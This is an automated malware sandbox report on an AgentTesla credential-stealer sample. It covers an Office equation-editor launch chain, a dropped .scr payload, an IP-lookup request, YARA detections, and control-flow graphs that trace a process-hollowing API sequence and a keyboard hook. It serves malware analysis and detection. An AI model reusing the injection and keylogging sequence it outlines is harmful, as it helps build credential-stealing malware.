                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                    1192.168.2.2249162172.67.74.1524433204C:\Users\user\AppData\Roaming\microme09255.scr
                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                    2024-04-26 01:05:52 UTC155OUTGET / HTTP/1.1
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                                                                                                    Host: api.ipify.org
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    2024-04-26 01:05:52 UTC211INHTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 26 Apr 2024 01:05:52 GMT
                                                                                                                                    Content-Type: text/plain
                                                                                                                                    Content-Length: 15
                                                                                                                                    Connection: close
                                                                                                                                    Vary: Origin
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 87a2aabe4ee931d7-MIA
                                                                                                                                    2024-04-26 01:05:52 UTC15INData Raw: 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30
                                                                                                                                    Data Ascii: 102.129.152.220


                                                                                                                                    Click to jump to process

                                                                                                                                    Click to jump to process

                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                    Click to jump to process

                                                                                                                                    Target ID:0
                                                                                                                                    Start time:03:05:45
                                                                                                                                    Start date:26/04/2024
                                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                                                    Imagebase:0x13ffe0000
                                                                                                                                    File size:1'423'704 bytes
                                                                                                                                    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:2
                                                                                                                                    Start time:03:05:46
                                                                                                                                    Start date:26/04/2024
                                                                                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:543'304 bytes
                                                                                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:5
                                                                                                                                    Start time:03:05:50
                                                                                                                                    Start date:26/04/2024
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\microme09255.scr
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\microme09255.scr"
                                                                                                                                    Imagebase:0xde0000
                                                                                                                                    File size:857'600 bytes
                                                                                                                                    MD5 hash:75DC78C375DFEE9C0B96FA476BCD5D1C
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: MALWARE_Win_DLInjector02, Description: Detects downloader injector, Source: 00000005.00000002.348836350.00000000047C0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000005.00000002.348615893.000000000339A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Antivirus matches:
                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:6
                                                                                                                                    Start time:03:05:50
                                                                                                                                    Start date:26/04/2024
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\microme09255.scr
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\microme09255.scr"
                                                                                                                                    Imagebase:0xde0000
                                                                                                                                    File size:857'600 bytes
                                                                                                                                    MD5 hash:75DC78C375DFEE9C0B96FA476BCD5D1C
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Yara matches:
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000006.00000002.883629068.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.883885788.0000000002310000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                    Reputation:low
                                                                                                                                    Has exited:false

                                                                                                                                    Target ID:7
                                                                                                                                    Start time:03:06:09
                                                                                                                                    Start date:26/04/2024
                                                                                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:543'304 bytes
                                                                                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Reputation:high
                                                                                                                                    Has exited:false

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:17.9%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:36.4%
                                                                                                                                      Total number of Nodes:33
                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                      execution_graph 2917 1c3c80 2918 1c3c9a 2917->2918 2919 1c3cea 2918->2919 2921 1c3d2f 2918->2921 2922 1c3d73 2921->2922 2938 1c3a70 2922->2938 2924 1c4520 2929 1c3918 WriteProcessMemory 2924->2929 2930 1c3910 WriteProcessMemory 2924->2930 2925 1c4325 2925->2924 2936 1c3918 WriteProcessMemory 2925->2936 2937 1c3910 WriteProcessMemory 2925->2937 2926 1c455e 2927 1c4646 2926->2927 2950 1c37f0 2926->2950 2954 1c3b90 2927->2954 2929->2926 2930->2926 2936->2925 2937->2925 2939 1c3ab4 VirtualAllocEx 2938->2939 2941 1c3b2c 2939->2941 2942 1c3918 2941->2942 2946 1c3910 2941->2946 2943 1c3964 WriteProcessMemory 2942->2943 2945 1c39fd 2943->2945 2945->2925 2947 1c3918 WriteProcessMemory 2946->2947 2949 1c39fd 2947->2949 2949->2925 2951 1c3839 Wow64SetThreadContext 2950->2951 2953 1c38b1 2951->2953 2953->2927 2955 1c3bd4 ResumeThread 2954->2955 2957 1c3c20 2955->2957 2957->2918 2958 1c4870 2959 1c48fd CreateProcessW 2958->2959 2961 1c4a56 2959->2961 2962 1c4ca0 ReadProcessMemory 2963 1c4d5f 2962->2963

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 60 1c3d2f-1c3d71 61 1c3d78-1c3efe 60->61 62 1c3d73 60->62 69 1c3f25-1c3f6a call 1c2de4 61->69 70 1c3f00-1c3f24 61->70 62->61 74 1c3f6c-1c3f88 69->74 75 1c3f93-1c3ffd 69->75 70->69 74->75 81 1c3fff 75->81 82 1c4004-1c4030 75->82 81->82 84 1c4091-1c40c3 call 1c2dfc 82->84 85 1c4032-1c4064 call 1c2df0 82->85 92 1c40ec 84->92 93 1c40c5-1c40e1 84->93 90 1c408d-1c408f 85->90 91 1c4066-1c4082 85->91 94 1c40ed-1c40f7 90->94 91->90 92->94 93->92 96 1c40fe-1c4144 call 1c2e08 94->96 97 1c40f9 94->97 103 1c416d-1c4186 96->103 104 1c4146-1c4162 96->104 97->96 105 1c41de-1c4256 call 1c3a70 103->105 106 1c4188-1c41b4 call 1c2e14 103->106 104->103 118 1c4258-1c4269 105->118 119 1c426b-1c426d 105->119 111 1c41dd 106->111 112 1c41b6-1c41d2 106->112 111->105 112->111 120 1c4273-1c4287 118->120 119->120 121 1c4289-1c42c3 120->121 122 1c42c4-1c42db 120->122 121->122 123 1c42dd-1c42f9 122->123 124 1c4304-1c4320 122->124 123->124 186 1c4323 call 1c3918 124->186 187 1c4323 call 1c3910 124->187 127 1c4325-1c4345 128 1c436e-1c43a3 127->128 129 1c4347-1c4363 127->129 133 1c44fb-1c451a 128->133 129->128 135 1c43a8-1c442c 133->135 136 1c4520-1c4559 133->136 146 1c44f0-1c44f5 135->146 147 1c4432-1c44a1 135->147 182 1c455c call 1c3918 136->182 183 1c455c call 1c3910 136->183 139 1c455e-1c457e 141 1c45a7-1c45da 139->141 142 1c4580-1c459c 139->142 148 1c45dc-1c45e3 141->148 149 1c45e4-1c45f7 141->149 142->141 146->133 189 1c44a4 call 1c3918 147->189 190 1c44a4 call 1c3910 147->190 148->149 152 1c45fe-1c4629 149->152 153 1c45f9 149->153 156 1c462b-1c4644 call 1c37f0 152->156 157 1c4693-1c46c5 call 1c2e20 152->157 153->152 163 1c4646-1c4666 156->163 164 1c46ee 157->164 165 1c46c7-1c46e3 157->165 158 1c44a6-1c44c6 161 1c44ef 158->161 162 1c44c8-1c44e4 158->162 161->146 162->161 166 1c468f-1c4691 163->166 167 1c4668-1c4684 163->167 168 1c46ef-1c4701 call 1c3b90 164->168 165->164 166->168 167->166 172 1c4703-1c4723 168->172 175 1c474c-1c4855 172->175 176 1c4725-1c4741 172->176 176->175 182->139 183->139 186->127 187->127 189->158 190->158
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID: (
                                                                                                                                      • API String ID: 0-3887548279
                                                                                                                                      • Opcode ID: 447c743081b1429605599c02b156a2ac7e6c2db5af5c5185000a32cee4f67917
                                                                                                                                      • Instruction ID: 987c5243ebdaafddfe31975e665ce814443d4746445d7004eec32ca4c87506e3
                                                                                                                                      • Opcode Fuzzy Hash: 447c743081b1429605599c02b156a2ac7e6c2db5af5c5185000a32cee4f67917
                                                                                                                                      • Instruction Fuzzy Hash: 1352C174E052288FDB64DF65C994BDDBBB2AF99300F1085EAD409A7291DB34AE85CF40
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 191 1c4864-1c48fb 193 1c48fd-1c490f 191->193 194 1c4912-1c4920 191->194 193->194 195 1c4937-1c4973 194->195 196 1c4922-1c4934 194->196 197 1c4975-1c4984 195->197 198 1c4987-1c4a54 CreateProcessW 195->198 196->195 197->198 202 1c4a5d-1c4b1c 198->202 203 1c4a56-1c4a5c 198->203 213 1c4b1e-1c4b47 202->213 214 1c4b52-1c4b5d 202->214 203->202 213->214 217 1c4b5e 214->217 217->217
                                                                                                                                      APIs
                                                                                                                                      • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001C4A41
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                      • Opcode ID: 86d64bafe44fd5ccd3852e2e70e774b1a634c1b4e29a94ae7309a5f3ed65d73e
                                                                                                                                      • Instruction ID: fcad48ac8525dc98251de6be0f04b6e2b36a96c547b2bb25097754536d725996
                                                                                                                                      • Opcode Fuzzy Hash: 86d64bafe44fd5ccd3852e2e70e774b1a634c1b4e29a94ae7309a5f3ed65d73e
                                                                                                                                      • Instruction Fuzzy Hash: 2181E2B4D002698FDB25CFA5C880BDDBBB5BF59300F1091AAE558B7260D7309E85CF54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 219 1c4870-1c48fb 220 1c48fd-1c490f 219->220 221 1c4912-1c4920 219->221 220->221 222 1c4937-1c4973 221->222 223 1c4922-1c4934 221->223 224 1c4975-1c4984 222->224 225 1c4987-1c4a54 CreateProcessW 222->225 223->222 224->225 229 1c4a5d-1c4b1c 225->229 230 1c4a56-1c4a5c 225->230 240 1c4b1e-1c4b47 229->240 241 1c4b52-1c4b5d 229->241 230->229 240->241 244 1c4b5e 241->244 244->244
                                                                                                                                      APIs
                                                                                                                                      • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 001C4A41
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CreateProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 963392458-0
                                                                                                                                      • Opcode ID: 2efe89219643949ff500b17775ee49afc0ed53d6a2063d3a5e6a41f8c3adc603
                                                                                                                                      • Instruction ID: c732f5d4a8f616aec49a64b8b91afe22642f4cede940367348d91d914542a572
                                                                                                                                      • Opcode Fuzzy Hash: 2efe89219643949ff500b17775ee49afc0ed53d6a2063d3a5e6a41f8c3adc603
                                                                                                                                      • Instruction Fuzzy Hash: A281D0B4D002298FEB24DFA5C980FDDBBB5BB59300F1091AAE518B7260DB309A85CF54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 246 1c3910-1c3983 249 1c399a-1c39fb WriteProcessMemory 246->249 250 1c3985-1c3997 246->250 252 1c39fd-1c3a03 249->252 253 1c3a04-1c3a56 249->253 250->249 252->253
                                                                                                                                      APIs
                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001C39EB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                      • Opcode ID: 4192646d82c94d689a10baf467f3b845ad7fa58abf3d7c512f23b47363b30549
                                                                                                                                      • Instruction ID: 35ad6ecd0d44c395b6aaa79e6a1819abc9394eab37d5c3fd8e42aa2c373cedf8
                                                                                                                                      • Opcode Fuzzy Hash: 4192646d82c94d689a10baf467f3b845ad7fa58abf3d7c512f23b47363b30549
                                                                                                                                      • Instruction Fuzzy Hash: F441ACB5D012589FCF00CFA9D984AEEFBF1BB49314F20942AE814B7250D374AA45CF64
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 258 1c3918-1c3983 260 1c399a-1c39fb WriteProcessMemory 258->260 261 1c3985-1c3997 258->261 263 1c39fd-1c3a03 260->263 264 1c3a04-1c3a56 260->264 261->260 263->264
                                                                                                                                      APIs
                                                                                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001C39EB
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProcessWrite
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3559483778-0
                                                                                                                                      • Opcode ID: f19c395d2f90985070e032c3e59afbd5b68947193b0372fdc0556b226af51850
                                                                                                                                      • Instruction ID: b3d5a0e33313b970ae88e90e9e6409da46fe1ac699eda75aafc5f4bf8d0447b7
                                                                                                                                      • Opcode Fuzzy Hash: f19c395d2f90985070e032c3e59afbd5b68947193b0372fdc0556b226af51850
                                                                                                                                      • Instruction Fuzzy Hash: 9A419AB4D012589FCF00DFA9D984AEEFBF1BB49314F20942AE818B7250D774AA45CF64
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 269 1c4c98-1c4d5d ReadProcessMemory 271 1c4d5f-1c4d65 269->271 272 1c4d66-1c4da4 269->272 271->272
                                                                                                                                      APIs
                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001C4D4D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                      • Opcode ID: 7593537d392a0e5d95f223152fb8fd370c022db18b717bdb84025a59d1ebee1a
                                                                                                                                      • Instruction ID: d7991cfbc11a26fdc57e8ae65c4da98df4366aede081a31742b34fdf5b099500
                                                                                                                                      • Opcode Fuzzy Hash: 7593537d392a0e5d95f223152fb8fd370c022db18b717bdb84025a59d1ebee1a
                                                                                                                                      • Instruction Fuzzy Hash: 1F419AB9D042589FCF11CFAAD484ADEFBB5BB1A310F10906AE814B7210D335AA45CF65
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 275 1c3a70-1c3b2a VirtualAllocEx 278 1c3b2c-1c3b32 275->278 279 1c3b33-1c3b7d 275->279 278->279
                                                                                                                                      APIs
                                                                                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 001C3B1A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: fc3e15a1d5515561160de4f1eed7dbb14da1145a74f438b3fc2b57ca4fbeed3d
                                                                                                                                      • Instruction ID: 38db0affcdc16cec7825388cd907050b834f921a47eb3ae1414bb1c5a0afbe5e
                                                                                                                                      • Opcode Fuzzy Hash: fc3e15a1d5515561160de4f1eed7dbb14da1145a74f438b3fc2b57ca4fbeed3d
                                                                                                                                      • Instruction Fuzzy Hash: A83197B8D002589FCF10DFA9D984A9EFBB1AF59310F20942AE814B7210D735AA05CF59
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 284 1c4ca0-1c4d5d ReadProcessMemory 285 1c4d5f-1c4d65 284->285 286 1c4d66-1c4da4 284->286 285->286
                                                                                                                                      APIs
                                                                                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 001C4D4D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: MemoryProcessRead
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1726664587-0
                                                                                                                                      • Opcode ID: 903a75eda28c51f3a2c7ccf3b6a6eebca75e6a82667576cac369b3d853b0a686
                                                                                                                                      • Instruction ID: 455ec8d6417931fe68a03ebaf7f3eb895323bf9d77cd69530a52081a775402d1
                                                                                                                                      • Opcode Fuzzy Hash: 903a75eda28c51f3a2c7ccf3b6a6eebca75e6a82667576cac369b3d853b0a686
                                                                                                                                      • Instruction Fuzzy Hash: 0D3169B9D042589FCF10CFAAD984ADEFBB5BB59310F10902AE814B7210D375AA45CF65
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 289 1c37f0-1c3850 291 1c3867-1c38af Wow64SetThreadContext 289->291 292 1c3852-1c3864 289->292 294 1c38b8-1c3904 291->294 295 1c38b1-1c38b7 291->295 292->291 295->294
                                                                                                                                      APIs
                                                                                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 001C389F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ContextThreadWow64
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 983334009-0
                                                                                                                                      • Opcode ID: 60c3b0858c205954b186596805f038df1e75db1ab02b3c744596ceb0597c1a3c
                                                                                                                                      • Instruction ID: 3be278880f985fbe3c474faa4d62bebc3c07c014f93cb6b3f9aabb2df0fc4992
                                                                                                                                      • Opcode Fuzzy Hash: 60c3b0858c205954b186596805f038df1e75db1ab02b3c744596ceb0597c1a3c
                                                                                                                                      • Instruction Fuzzy Hash: 4531AEB4D002589FDB14DFAAD984AEEFBF1BF49314F24802AE814B7240D778AA45CF54
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 300 1c3b90-1c3c1e ResumeThread 303 1c3c27-1c3c69 300->303 304 1c3c20-1c3c26 300->304 304->303
                                                                                                                                      APIs
                                                                                                                                      • ResumeThread.KERNELBASE(?), ref: 001C3C0E
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.348087326.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_1c0000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ResumeThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 947044025-0
                                                                                                                                      • Opcode ID: d81d32303c9222dcfebdb50b7c13a8914a54c9c5deb40b7a16b26b3b8a9cfb20
                                                                                                                                      • Instruction ID: 70db0c6e40ca1cfd98901f5d89cb27091d27badc1084816f857d0ed8a504383d
                                                                                                                                      • Opcode Fuzzy Hash: d81d32303c9222dcfebdb50b7c13a8914a54c9c5deb40b7a16b26b3b8a9cfb20
                                                                                                                                      • Instruction Fuzzy Hash: D031AEB4D002189FCF14DFA9D584ADEFBB5AF49310F20941AE814B7350C735A945CF59
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.348043733.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_16d000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 8e1cb5f37d0bbc01d7b7caa2f6b9e10add0cbbddfd938dc92730dd27ccb5c1c9
                                                                                                                                      • Instruction ID: 3299a21591ab433a2d9499a64746e7adfff0d81f0c18b4bc1903d5749557813d
                                                                                                                                      • Opcode Fuzzy Hash: 8e1cb5f37d0bbc01d7b7caa2f6b9e10add0cbbddfd938dc92730dd27ccb5c1c9
                                                                                                                                      • Instruction Fuzzy Hash: 6221D0B2A04240DFEB05DF54EDD0B26BB65FB88324F34C56DE9054B246C336D866DBA2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000005.00000002.348043733.000000000016D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0016D000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_5_2_16d000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: a03215431c7700aa6d9f63b8d2e83db64d9b4d821f1e853ea9c686936a1dca5e
                                                                                                                                      • Instruction ID: e46e69a92f7490f9abe452c07af504f9902894eff6dcb2729874df963d18a305
                                                                                                                                      • Opcode Fuzzy Hash: a03215431c7700aa6d9f63b8d2e83db64d9b4d821f1e853ea9c686936a1dca5e
                                                                                                                                      • Instruction Fuzzy Hash: A911AF76904280CFDB15CF14D9C4B16BF61FB84324F24C5ADD8054B616C33AD86ACBA2
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:11%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:3
                                                                                                                                      Total number of Limit Nodes:0
                                                                                                                                      execution_graph 19272 929ff8 19273 92a03c SetWindowsHookExA 19272->19273 19275 92a082 19273->19275
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 96b8fa80efb55bdb53402c8d30ccea6e64793f84a74e95af0a65efe780573368
                                                                                                                                      • Instruction ID: 2da130817014c95ba177090104101c2c38c0b57e8f6a87f83a7d7ec2d6145d0d
                                                                                                                                      • Opcode Fuzzy Hash: 96b8fa80efb55bdb53402c8d30ccea6e64793f84a74e95af0a65efe780573368
                                                                                                                                      • Instruction Fuzzy Hash: DA53E731C10B1A8ADB51EF68C88469DF7B1FF99300F11D79AE459B7121EB70AAD4CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000006.00000002.883530349.0000000000390000.00000040.00000800.00020000.00000000.sdmp, Offset: 00390000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_6_2_390000_microme09255.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 699b086a017c556f7e5c76d30c7b4d60e200bdc140bf1585f38f31aa7631d02b
                                                                                                                                      • Instruction ID: 6b9e79ba2f128ce376808e9b5c3a3bc22d473e70c717d05e6d4b96d3152f70f4
                                                                                                                                      • Opcode Fuzzy Hash: 699b086a017c556f7e5c76d30c7b4d60e200bdc140bf1585f38f31aa7631d02b
                                                                                                                                      • Instruction Fuzzy Hash: B7332C31D107198EDB11EF68C8846ADF7B1FF99300F15D79AE449AB211EB70AAC5CB81
                                                                                                                                      Uniqueness

                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                      Memory Dump Source
